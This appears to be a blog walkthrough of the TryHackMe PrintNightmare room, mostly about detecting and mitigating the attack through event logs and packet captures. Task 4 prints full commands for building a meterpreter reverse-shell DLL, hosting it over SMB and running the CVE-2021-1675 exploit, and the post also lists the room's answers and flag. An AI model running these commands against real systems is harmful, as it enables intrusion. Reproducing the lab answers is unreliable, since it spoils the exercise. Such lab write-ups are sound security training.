Zenn
🙀

Print Nightmare Walkthrough [TryHackMe]

2023/11/09に公開
Windows
TryHackMe
#
printnightmare
tech

Print Nightmare

Room URL
https://tryhackme.com/room/printnightmarehpzqlp8

What is Print Nightmare?

CVE-2021-34527, or PrintNightmare, is a vulnerability in the Windows Print Spooler that allows for a low priv user to escalate to administrator on a local box or on a remote server.
(https://0xdf.gitlab.io/2021/07/08/playing-with-printnightmare.html)

Task 2

Where would you enable or disable Print Spooler Service?

Answer: Services

Task 3

Provide the CVE of the Windows Print Spooler Remote Code Execution Vulnerability that doesn't require local access to the machine.

Answer: CVE-2021-34527

What date was the CVE assigned for the vulnerability in the previous question?

Answer: 07/02/2021

Task 4

What is the flag residing on the Administrator's Desktop?

Answer: : THM{SiGBQPMkSvejvmQNEL}

Impacket and Pyasn1 were already installed.

$ pip list | grep impacket
$ pip list | grep pyasn1


(pyasn1 version > 0.4.2)

Clone the git repository.

$ git clone https://github.com/tryhackme/CVE-2021-1675.git

Create a malicious DLL.

$ msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.18.58.92 LPORT=4444 -f dll -o malicious.dll

Listen on port 4444 using Metasploit.

$ msfconsole
> use exploit/multi/handler
> set payload windows/x64/meterpreter/reverse_tcp
> set lhost 10.18.58.92
> run -j

Share kali directory using smbserver.py.

$ python3 /usr/share/doc/python3-impacket/examples/smbserver.py kali . -smb2support

Verify if the attack is feasible.

$ /usr/share/doc/python3-impacket/examples/rpcdump.py @10.10.24.145 | egrep 'MS-RPRN|MS-PAR'
sh: 0: getcwd() failed: No such file or directory
Protocol: [MS-PAR]: Print System Asynchronous Remote Protocol 
Protocol: [MS-RPRN]: Print System Remote Protocol

Execute the exploit!

$ cd CVE-2021-1675
$ python CVE-2021-1675.py Finance-01.THMdepartment.local/sjohnston:mindheartbeauty76@10.10.24.145 '\\10.18.58.92\kali\malicious.dll'

Download the DLL via SMB and establish a connection with Metasploit.

Task 5

Provide the first folder path where you would likely find the dropped DLL payload.

Answer: C:\Windows\System32\spool\drivers\x64\3\

Considering the usage of the pcAddPrinterDriverEx() function, you will mostly find the malicious DLL dropped into one of these folders %WINDIR%\system32\spool\drivers\x64\3\ folder along with DLLs that were loaded afterward from

Provide the function that is used to install printer drivers.

Answer: pcAddPrinterDriverEx()

The pcAddPrinterDriverEx() function is used to install a printer driver on the system.

What tool can the attacker use to scan for vulnerable print servers?

Answer: rpcdump.py

root@attackbox:~/Desktop/pn# rpcdump.py @10.10.109.79 | egrep 'MS-RPRN|MS-PAR' 
Protocol: [MS-RPRN]: Print System Remote Protocol 
Protocol: [MS-PAR]: Print System Asynchronous Remote Protocol

Task 6

Provide the name of the dropped DLL, including the error code.

Answer: svch0st.dll,0x45A

Open Event Viewer
Look Applocations and Services > Microsoft > Windows > PrintService > Admin

Provide the event log name and the event ID that detected the dropped DLL.

Answer: Microsoft-Windows-PrintService/Admin,808

Find the source name and the event ID when the Print Spooler Service stopped unexpectedly and how many times was this event logged?

Answer: Service Control Manager,7031,1

Windows Logs > System
Filter Current Log
event id: 7031

After some threat hunting steps, you are more confident now that it's a PrintNightmare attack. Hunt for the attacker's shell connection. Provide the log name, event ID, and destination port.

Answer: Microsoft-Windows-Sysmon/Operational,3,4747

Applocations and Services > Microsoft > Windows > Sysmon > Operational
Filter Current Log
event id: 3
Check the logs around the time of the attack at approximately 10:33 AM on 8/13/2021.

Oh no! You think you've found the attacker's connection. You need to know the attacker's IP address and the destination hostname in order to terminate the connection. Provide the attacker's IP address and the hostname.

Answer: 10.10.210.100,ip-10-10-210-100.eu-west-1.compute.internal

A Sysmon FileCreated event was generated and logged. Provide the full path to the dropped DLL and the earliest creation time in UTC.

Answer: C:\Windows\System32\spool\drivers\x64\3\New\svch0st.dll,2021-08-13 17-33-37

Filter Current Log
event id: 11

Task 7

Change Time Display Format

View > Time Display Format

Select UTC Time of Day

Statistics > Protocol Hierarchy

Using SMB.

Since Print Nightmare involved transferring tools via SMB in the Task4,
let's take a look at SMB for now.

What is the host name of the domain controller?

Answer: WIN-1O0UJBNP9G7

What is the local domain?

Answer: printnightmare.local

What user account was utilized to exploit the vulnerability?

Answer: lowprivlarry

What was the malicious DLL used in the exploit?

Answer: letmein.dll

What was the attacker's IP address?

Answer: 10.10.124.236


It can be inferred that a DLL was shared via SMB.

What was the UNC path where the malicious DLL was hosted?

Answer: \10.10.124.236\sharez

There are encrypted packets in the results. What was the associated protocol?

Answer: SMB3

Task 8

Provide two ways to manually disable the Print Spooler Service.

Answer: PowerShell,Group Policy

Where can you disable the Print Spooler Service in Group Policy?

Answer: Computer Configuration / Administrative Templates / Printers

Provide the command in PowerShell to detect if Print Spooler Service is enabled and running.

Answer: Get-Service -Name Spooler

Thanks for reading!

Ref

Microsoft | Windows Print Spooler Remote Code Execution Vulnerability
0xdf hacks stuff | Playing with PrintNightmare
Medium | Understanding PrintNightmare Vulnerability

Discussion